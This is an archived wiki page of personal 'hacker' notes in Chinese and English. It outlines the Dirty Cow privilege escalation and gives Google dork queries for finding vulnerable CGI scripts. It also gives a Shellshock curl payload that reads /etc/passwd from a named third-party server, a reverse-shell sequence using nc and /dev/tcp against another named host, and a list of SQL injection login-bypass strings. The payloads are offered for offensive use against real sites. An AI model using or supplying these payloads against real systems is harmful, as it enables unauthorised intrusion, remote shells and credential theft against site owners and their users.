Hacker

    版本為 14:38, 26 Dec 2024

    到這個版本。

    返回到 版本存檔.

    查閱目前版本

    A notes for being a hacker

    更多文章

    Scanner

    Dirty Cow (CVE-2016-5195)

    Release Date: 2016/10/19

    Introduction to the vulnerability

    如果主機有開放一般帳號可存取 shell,透過這個漏洞
    NOTE:即使系統沒有開放 shell,攻擊者仍可以透過其他漏洞先取得 shell 存取後,再進行這個漏洞的攻擊。

    • 一般帳號可以不經授權修改 /etc/passwd 密碼檔,進而取得 root 權限。
    • 一般帳號可以直接修改任何一個唯讀檔案裡的內容。

    RedHat 官網資訊

     

    攻擊工具

     

    Resolution

    ShellShock (CVE-2014-6271)

    Scanning the target with Google

    inurl:cgi-bin filetype:sh site:edu
    inurl:/cgi-bin/ ext:sh 
    

    Attempt to get the username remotely

    curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh
    

    Reverse SHELL

    > php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c ls
     

    if it response as 'Command sent to the server!', continue with the follows

    > nc -lp 4444 -vv 
    
    Waiting untill the PHP command is completed.
    If all goes well, you can issue any commands here. 
    

    Open another terminal. issue the command

    > php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/here.is.my.IP/4444 0>&1"
    

    SQL Injection

    Checking if the Login form with SQL Injection
    http://www.joellipman.com/articles/w...abilities.html

    // Username
    admin' --  
    admin' #  
    admin'/* 
    
     // Password
    ' or 1=1--  
    ' or 1=1#  
    ' or 1=1/*  
    ') or '1'='1--  
    ') or ('1'='1-- 
    
    Powered by MindTouch Core